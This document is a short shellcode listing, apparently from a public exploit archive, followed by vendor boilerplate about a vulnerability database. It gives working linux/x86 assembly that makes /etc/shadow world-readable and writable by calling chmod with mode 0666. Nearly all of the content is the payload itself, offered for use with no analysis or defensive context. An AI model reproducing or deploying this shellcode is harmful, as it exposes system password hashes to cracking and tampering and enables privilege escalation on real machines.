========================================
linux/x86 chmod 666 /etc/shadow 27 bytes
========================================
; linux/x86 chmod 666 /etc/shadow 27 bytes
; [email protected]
; 2010-01-15
section .text
global _start
_start:
; chmod("//etc/shadow", 0666);
mov al, 15
cdq
push edx
push dword 0x776f6461
push dword 0x68732f63
push dword 0x74652f2f
mov ebx, esp
mov cx, 0666o
int 0x80
# 0day.today [2018-01-08] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation